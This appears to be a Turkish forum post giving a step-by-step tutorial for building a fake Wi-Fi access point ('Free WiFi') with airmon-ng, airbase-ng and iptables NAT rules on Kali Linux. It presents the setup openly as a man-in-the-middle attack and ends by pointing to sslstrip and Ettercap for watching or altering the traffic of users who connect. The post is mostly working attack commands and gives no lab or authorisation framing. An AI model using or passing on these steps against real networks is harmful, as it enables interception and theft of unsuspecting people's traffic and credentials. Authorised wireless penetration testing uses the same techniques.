Neler Yeni

Sahte Kablosuz Ağ Erişim Noktası [Fake AP] Oluşturulması

Sahte Kablosuz Ağ Erişim Noktası [Fake AP] Oluşturulması
Sahte kablosuz ağ erişim noktası (Fake AP), gerçek bir kablosuz ağa benzeyen ancak aslında saldırganın kontrolünde olan bir kablosuz ağdır. Bu sayede saldırgan, bağlanan kullanıcıların internet trafiğini izleyebilir, yönlendirebilir veya değiştirebilir. Bu, ortadaki adam (man-in-the-middle) saldırısı olarak bilinen bir tekniktir.
Sahte kablosuz ağ erişim noktası oluşturmak için Kali Linux gibi bir işletim sistemi kullanabilirsiniz. Kali Linux, dijital adli tıp ve sızma testi için tasarlanmış bir Debian türevi Linux dağıtımıdır. Kali Linux, aircrack-ng gibi birçok güvenlik aracı içerir. Aircrack-ng, kablosuz ağlara saldırmak için kullanılan bir araç setidir. Aircrack-ng içindeki airbase-ng aracı, sahte kablosuz ağ erişim noktası oluşturmak için kullanılabilir.
Sahte kablosuz ağ erişim noktası oluşturmak için aşağıdaki adımları izleyebilirsiniz:
1. Adım: Kablosuz kartınızı izleme (monitor) moduna alın. Bunu aşağıdaki komutla yapabilirsiniz:
airmon-ng start wlan0
Bu, izleme modunda yeni bir kablosuz arayüz, wlan0mon, başlatacaktır.
2. Adım: Sahte kablosuz ağ erişim noktası için bir kanal seçin. Bunu aşağıdaki komutla yapabilirsiniz:
iwconfig wlan0mon channel 6
Bu, sahte kablosuz ağ erişim noktası için 6. kanalı kullanacaktır.
3. Adım: Sahte kablosuz ağ erişim noktası başlatın. Bunu aşağıdaki komutla yapabilirsiniz:
airbase-ng -c 6 -e "Free WiFi" wlan0mon
Bu, 6. kanalı kullanarak, SSID (isim) olarak "Free WiFi" olan yeni bir kablosuz ağ erişim noktası oluşturacaktır.
4. Adım: Müşterilerinizin sahte kablosuz ağ erişim noktası üzerinden internete bağlanabilmesi için bazı NAT kuralları ayarlayın. Bunu aşağıdaki komutlarla yapabilirsiniz:
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables --append FORWARD --in-interface wlan0mon -j ACCEPT
echo 1 > /proc/sys/net/ipv4/ip_forward
Bu komutlar, eth0 arayüzü üzerinden internete bağlı olduğunuzu varsaymaktadır. Eğer farklı bir arayüz kullanıyorsanız, eth0 yerine onu yazın.
Ve işte bu kadar! Sahte kablosuz ağ erişim noktanız artık çalışıyor. Bağlanan kullanıcıların internet trafiğini izlemek veya değiştirmek için sslstrip veya Ettercap gibi araçlar kullanabilirsiniz.

Konuyu görüntüleyen kullanıcılar